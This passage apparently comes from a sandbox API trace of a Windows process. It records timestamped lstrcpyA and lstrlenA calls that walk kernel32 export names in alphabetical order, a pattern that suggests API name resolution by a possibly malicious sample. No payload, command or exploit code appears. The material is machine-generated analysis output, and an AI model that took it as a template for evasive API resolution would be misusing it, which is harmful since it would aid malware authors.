returned="CreateActCtxA" [0087.298] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.298] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.298] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.298] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.298] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.298] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.298] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.298] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.298] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.298] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.298] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.298] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.298] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.298] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.298] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.298] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.298] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.299] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.299] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.299] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.299] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.299] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.299] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.299] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.299] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.299] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.299] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.299] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.299] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.299] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.299] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.299] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.299] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.299] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.299] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.299] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.300] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.300] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.300] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.300] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.300] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.300] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.300] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.300] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.300] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.300] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.300] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.300] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.300] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.300] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.300] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.300] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.300] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.300] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.301] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.301] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.301] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.301] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.301] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.301] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.301] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.301] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.301] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.301] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.301] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.301] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.301] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.301] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.301] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.301] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.301] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.301] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.301] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.302] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.302] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.302] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.302] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.302] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.302] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.302] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.302] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.302] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.302] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.302] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.302] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.302] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.302] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.302] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.302] lstrlenA (lpString="DELETEATOM") returned 10 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.302] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.302] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.303] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.303] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.303] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.303] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.303] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.303] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.303] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.303] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.303] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.303] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.303] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.303] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.303] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.303] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.303] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.303] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.303] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.303] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.303] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.304] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.304] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.304] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.304] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.304] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.304] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.304] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.304] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.304] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.304] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.304] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.304] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.304] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.304] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.304] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.304] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.304] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" 